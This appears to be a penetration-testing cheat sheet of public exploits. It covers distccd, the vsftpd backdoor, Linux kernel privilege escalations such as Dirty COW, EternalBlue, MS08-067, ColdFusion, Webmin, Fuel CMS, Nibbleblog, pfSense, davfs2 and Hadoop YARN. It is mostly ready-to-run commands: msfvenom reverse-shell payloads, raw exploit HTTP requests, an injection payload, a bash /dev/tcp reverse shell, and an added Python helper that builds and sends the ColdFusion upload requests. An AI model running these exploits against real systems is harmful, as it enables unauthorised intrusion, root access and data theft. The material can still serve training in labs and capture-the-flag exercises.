Public Exploits

distccd v1 (CVE-2004-2687: distccd accepts compile jobs from anyone and execs whatever argv[0] it is given, so commands run as the daemon user)

# Detect, then run a command through the nmap script
nmap --script distcc-cve2004-2687 -p 3632 10.10.10.3
nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687 --script-args="distcc-cve2004-2687.cmd='nc -nv 10.10.14.6 4444 -e /bin/bash'"
# nc -e needs a netcat build that supports it; otherwise use a bash /dev/tcp or python reverse shell

# Public exploit script; the command runs as the distccd user (daemon here)
python CVE-2004-2687.py -t 10.10.10.3 -p 3632 -c whoami
[OK] Connected to remote service

--- BEGIN BUFFER ---
daemon
--- END BUFFER ---
[OK] Done.

VSFTPD v2.3.4

nmap --script ftp-vsftpd-backdoor -p 21 10.10.10.3
# Manual exploitation: any username ending in ":)" triggers the backdoor (the password is irrelevant)
telnet IP 21
USER user:)
PASS pass

# Check whether port 6200 has opened: the backdoor is a root shell listening there, with no prompt or banner.

Kernel Exploits

Linux Kernel 2.6 < 2.6.19 (CentOS 4.x / Fedora Core 4-6, x86) - 'ip_append_data()' Ring0 Privilege Escalation (EDB 9542)

cp /usr/share/exploitdb/exploits/linux_x86/local/9542.c .
# --hash-style=both keeps the binary loadable by the old glibc on these targets
gcc -m32 -Wl,--hash-style=both 9542.c -o 9542

Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) - udev Netlink Local Privilege Escalation (CVE-2009-1185, EDB 8572)

  • Requires:

    • PID of the udevd netlink socket: the non-zero Pid in /proc/net/netlink (usually the udevd PID minus one, not the value from ps)

    • Create /tmp/run. The exploit runs /tmp/run as root

      cat /proc/net/netlink
      sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
      dcc4be00 15  2687   00000001 0        0        00000000 2
      ddf0dc00 15  0      00000000 0        0        00000000 2

Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation

#Tested on x86 - Linux 3.0.0-12-generic
gcc mempodipper.c -o espriv
./espriv

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' (CVE-2016-5195, EDB 40839)

gcc -pthread dirty.c -o dirty -lcrypt
./dirty

# Or with a chosen password: ./dirty my-new-password
# The exploit writes a root user "firefart" into /etc/passwd and backs the original up to /tmp/passwd.bak
su firefart

# Or ssh firefart@...

# Restore the original file when done: mv /tmp/passwd.bak /etc/passwd

Link: https://www.exploit-db.com/exploits/47080

gcc Exploit.c -o Exploit -lcrypto

./Exploit 0x6b 192.168.1.5 443 -c 50

Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation (CVE-2017-16995, EDB 45010)

Link: https://www.exploit-db.com/exploits/45010

  • Compile on the attacking machine and copy the binary to the target if the target has no gcc. Match the target's architecture, and build with -static to avoid glibc version mismatches.

Elastix 2.2

PBX

MS17-010 [EternalBlue]

EXPLOIT 1

Reference: https://outrunsec.com/2020/07/26/cyberseclabs-eternal-walkthrough/

git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
cd AutoBlue-MS17-010
pip install -r requirements.txt

# Check that the target is vulnerable and identify accessible named pipes
python eternal_checker.py <Target>

# Opens an interactive SMB shell. This may not always work
python zzz_exploit.py <Target>

# Generate a payload (prompts for the listener address, port and payload type)
cd shellcode
sudo ./shell_prep.sh
cd ..

# Both x64 and x86 payloads are generated (sc_all.bin contains both). Select based on target arch; start the listener before running
python eternalblue_exploit7.py <Target> shellcode/sc_all.bin

EXPLOIT 2

Exploit-DB 42315 (worawit's EternalBlue exploit for Windows 7 / 2008 R2).

  1. Download mysmb.py since the exploit imports it. The download location is given in the exploit's header comment.

  2. Use msfvenom to create a reverse shell payload.

  3. Edit the exploit to add the authentication credentials and the reverse shell payload. [Guest :: <Blank password>]

Generate Payload

msfvenom -p windows/shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exe

Exploit Modification

  • In smb_pwn(), modify the two lines for smb_send_file and service_exec:

    • Uncomment the lines

    • smb_send_file: the local path of shell.exe to send and the path to drop it at on the target

    • service_exec: the command to execute on the target, i.e. the dropped shell.exe

  • Add Authentication Credentials

    • USERNAME = 'guest' for anonymous login

    • If the above does not work, try USERNAME = ''

# Set up the listener on LPORT first

# Identify a valid named pipe (AutoBlue's eternal_checker.py from Exploit 1 lists accessible pipes)
python eternal_checker.py <Target>

python 42315.py 10.10.10.40
python 42315.py 10.10.10.40 <named pipe>

EXPLOIT 3

MS08-067

Create Shellcode

  • -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" - The bad characters to avoid; taken from the comments in the Python exploit.

  • -f py - Output in Python format. The exploit's own examples use C format and paste it in slightly differently; either works.

  • -v shellcode - Name the variable shellcode instead of the default buf, so it matches the name used in the exploit.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows

Paste this shellcode into the script, replacing the default.

The exploit needs the target's Windows version and language pack, selected by the numeric OS id from its usage examples:

Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445
Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal
Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English
Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)
Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)
Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)
# Set up a listener on LPORT first
# Usage: python <exploit>.py <target> <os id> <port>
python ms08-067.py 10.10.10.4 6 445

ColdFusion 8

LFI (CVE-2010-2861, directory traversal in the locale parameter)

http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
  • Grab the hash (the password= line is an unsalted SHA-1 of the admin password) and crack it.

RCE through Scheduled Task:

  • Login -> Debugging & Logging -> Scheduled Tasks.

  • A scheduled task can fetch a URL and save the response to a local file, so it can drop a JSP shell into the webroot.

  • Find the webroot path: http://10.11.1.10/CFIDE/administrator/reports/index.cfm > ColdFusion Mappings (default C:\ColdFusion8\wwwroot).

  • Create a reverse shell and host it on our server.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.10 LPORT=443 -f raw > shell.jsp
python -m SimpleHTTPServer 80
  • Set the task config as below:

    • Task Name: Shell

    • URL: Webserver hosting the JSP shell

    • Check the box for Save output to a file

    • File: C:\ColdFusion8\wwwroot\CFIDE\shell.jsp

  • After submitting, run the task on demand under Actions.

  • Start a listener and browse to http://10.10.10.18:8080/CFIDE/shell.jsp

| --- CVE-2009-2265 --- |

- RCE through File Upload (unauthenticated FCKeditor connector; the uploaded file is typically served from /userfiles/file/<name>):

./exploit.py <target ip> <target port> </path/to/payload.jsp>

- Manual Exploitation: the %00 after the wanted filename in CurrentFolder truncates the server-side path, so the .txt upload is stored as exp.cfm. Content-Length must match the real body length.

POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/exp.cfm%00 HTTP/1.0
Host: 111.111.11.11
Content-Length: 287
Content-Type: multipart/form-data; boundary=o0oOo0o
Connection: close

--o0oOo0o
Content-Disposition: form-data; name="NewFile"; filename="exploit.txt"
Content-Type: text/plain

 %Exploit code%
--o0oOo0o--

| ---CVE-2018-15961--- |

Metasploit Module: https://packetstormsecurity.com/files/151095/Adobe-Coldfusion-11-CKEditor-Arbitrary-File-Upload.html

# Unauthenticated upload through the CKEditor file manager. Access the uploaded file at <URL>/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell
# The multipart body needs CRLF line endings, a blank line between each part's headers and its content, and a Content-Length that matches the real body.

POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1
Host: 172.31.1.15:8500
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
Content-Type: multipart/form-data; boundary=---------------------------24464570528145
Content-Length: 1832
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------24464570528145
Content-Disposition: form-data; name="file"; filename="shell"
Content-Type: text/plain

<Exploit-code in JSP>
-----------------------------24464570528145
Content-Disposition: form-data; name="path"

shell
-----------------------------24464570528145--
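Both ColdFusion upload requests above are hand-written multipart POSTs, and the two things that most often break them when typed by hand are a Content-Length that does not match the body and a missing blank line between a part's headers and its content. As an added example (not code from the page, the exploit-db script, or the Metasploit module), the following builds both requests with the body encoded correctly and the length computed from it. Field names and paths are taken from the requests on the page; the hosts, the boundary and the CFML probe in the usage line are assumptions.

```python
import socket

BOUNDARY = "o0oOo0o"


def build_multipart(parts, boundary=BOUNDARY):
    """Encode a multipart/form-data body with CRLF line endings.
    parts: list of (field name, filename or None, content type or None, data bytes)."""
    body = b""
    for name, filename, ctype, data in parts:
        body += b"--" + boundary.encode() + b"\r\n"
        disposition = 'Content-Disposition: form-data; name="%s"' % name
        if filename is not None:
            disposition += '; filename="%s"' % filename
        body += disposition.encode() + b"\r\n"
        if ctype is not None:
            body += ("Content-Type: %s" % ctype).encode() + b"\r\n"
        body += b"\r\n" + data + b"\r\n"  # blank line separates part headers from part content
    body += b"--" + boundary.encode() + b"--\r\n"
    return body


def build_post(host, path, body, boundary=BOUNDARY, version="HTTP/1.0"):
    """Raw HTTP POST whose Content-Length is computed from the real body."""
    headers = [
        "POST %s %s" % (path, version),
        "Host: %s" % host,
        "Content-Type: multipart/form-data; boundary=%s" % boundary,
        "Content-Length: %d" % len(body),
        "Connection: close",
    ]
    return ("\r\n".join(headers) + "\r\n\r\n").encode() + body


def fckeditor_upload(host, shell_name, code):
    """CVE-2009-2265: the %00 after the wanted name in CurrentFolder truncates the
    server-side path, so the .txt upload is stored under shell_name instead."""
    path = ("/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm"
            "?Command=FileUpload&Type=File&CurrentFolder=/%s%%00" % shell_name)
    body = build_multipart([("NewFile", "exploit.txt", "text/plain", code)])
    return build_post(host, path, body)


def ckeditor_upload(host, shell_name, code):
    """CVE-2018-15961: a file part plus a plain 'path' field naming the stored file."""
    path = "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm"
    body = build_multipart([("file", shell_name, "text/plain", code),
                            ("path", None, None, shell_name.encode())])
    return build_post(host, path, body, version="HTTP/1.1")


def content_length_check(request):
    """Return (declared Content-Length, actual body length) for a raw request; they must be equal."""
    head, _, body = request.partition(b"\r\n\r\n")
    declared = None
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            declared = int(line.split(b":", 1)[1])
    return declared, len(body)


def send_raw(host, port, request, timeout=10):
    """Deliver the raw request over TCP and return the server's reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        reply = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            reply += chunk
    return reply


if __name__ == "__main__":
    # Constructed sample: a harmless CFML probe instead of a real shell; target host is assumed
    req = fckeditor_upload("111.111.11.11", "exp.cfm", b"<cfoutput>#Now()#</cfoutput>")
    print(req.decode(errors="replace"))
```

Paste the printed request into Burp Repeater, or hand it to send_raw() against port 80 (or 8500 for the CKEditor case); either way, check content_length_check() before sending, because a wrong length makes the server either hang waiting for bytes or drop the tail of the body.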

Webmin

File Disclosure [LFI] (CVE-2006-3392, Webmin < 1.290 / Usermin < 1.220)

  • http://<url>/unauthenticated/ followed by ..%01/ repeated about 40 times (any count deeper than the webroot works), then the file to read:

http://<url>/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd

Fuel CMS 1.4 RCE

Fuel CMS 1.4.1 and earlier evaluate the contents of the filter parameter as PHP (CVE-2018-16763), which gives unauthenticated RCE.

  • Use Burp to intercept, as the command output appears in the response source before the page markup.

Payload (the URL-encoded form of '+pi(print($a='system'))+$a('<insert code here>')+'):

https://<TARGET-IP>/fuel/pages/select?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27<insert code here >%27%29%2b%27

For example, within Burp: /fuel/pages/select?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27whoami;cat /etc/passwd%27%29%2b%27

To get a reverse shell, run through the same injection:

  • wget http://<attackers-IP>/webshell.php -O shell.php   (capital -O writes the download to shell.php; lowercase -o only sets wget's log file)

  • Set up a listener & access http://<target-IP>/shell.php

DotNetNuke [DNN]

Nibbleblog 4.0.3

Pre-requisites:

  • Valid admin credentials: the upload goes through the authenticated plugin configuration page (CVE-2015-6967).

Exploitation

  • Login to nibbleblog: http://<IP>/nibbleblog/admin.php?controller=plugins

  • Upload a PHP reverse shell as the image for the My Image plugin: http://<IP>/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image

    • Ignore the errors the page shows; the file is still written

  • Access the webshell at its default location (the upload is always renamed image.php): http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php

pfSense

Reference: Exploit-DB 43560 (pfSense < 2.1.4 status_rrd_graph_img.php command injection)

  • Vulnerability arises because the '|' character is not filtered from the database parameter, so a shell pipeline can be appended to the rrdtool command.

  • Target URL: <URL>/status_rrd_graph_img.php?database=queues;printf+'<octal-escaped payload>'|sh

Pre-requisites:

  • Admin credentials [Default admin :: pfsense]

Exploitation

  • Python payload -> converted to octal escapes (so only backslashes, digits and quotes cross the filter) -> a few characters removed to avoid errors -> reconstructed on the target by printf -> piped into sh

python 43560.py --rhost 10.10.10.60 --lhost 10.10.14.5 --lport 4445 --username rohit --password pfsense

Davfs2 1.4.6 Local Priv Esc (EDB 28806, CVE-2013-4362: setuid mount.davfs runs modprobe through system())

# Find the file storing the WebDAV auth credentials (AuthUserFile in the vhost config)
head /etc/apache2/sites-enabled/000-default

# Add credentials for a new user [use htpasswd or htdigest to match the existing hash type]
htdigest /<Location of Basic Auth credentials file> webdav newuser
# <Enter password for newuser>

# Carve the exploit's C source, Makefile and shell script out of the EDB text
wget --no-check-certificate https://www.exploit-db.com/download/28806 -O 28806.temp.txt
tr -d '\r' < 28806.temp.txt > 28806.txt
sed -n '40,73p' 28806.txt > coda.c
sed -n '84,90p' 28806.txt > Makefile
sed -n '101,192p' 28806.txt > exploit.sh

# Program the exploit runs as root: a bash reverse shell. Use the same path on every line.
echo '#!/usr/bin/env bash' > /home/dave/rootprog
echo 'bash -i >& /dev/tcp/<Attacker IP>/1234 0>&1' >> /home/dave/rootprog
chmod +x /home/dave/rootprog
chmod +x exploit.sh
# Tell mount.davfs to use the coda kernel filesystem so it tries to modprobe the module the exploit built
echo 'kernel_fs       coda' >> ~/.davfs2/davfs2.conf

# Set up listener on attacker host
nc -nlvp 1234

# Execute exploit on target (the mount point must be a davfs2 entry in /etc/fstab that the user may mount)
./exploit.sh
mount /mnt/dav/
# Enter credentials for newuser when prompted.

Hadoop YARN RCE (unauthenticated ResourceManager REST API)

# Check if the API endpoint is available
curl -v -X POST 'http://ip:8088/ws/v1/cluster/apps/new-application'

# Expected response
{"application-id":"application_1527144634877_20465","maximum-resource-capability":{"memory":16384,"vCores":8}}

# Create an application spec (test.json) whose container command is the payload, and submit it via curl
curl -s -i -X POST -H 'Accept: application/json' -H 'Content-Type: application/json' 'http://ip:8088/ws/v1/cluster/apps' --data-binary @test.json
  • Contents of test.json

Apache NiFi RCE

python exploit.py <Target IP> <Command>
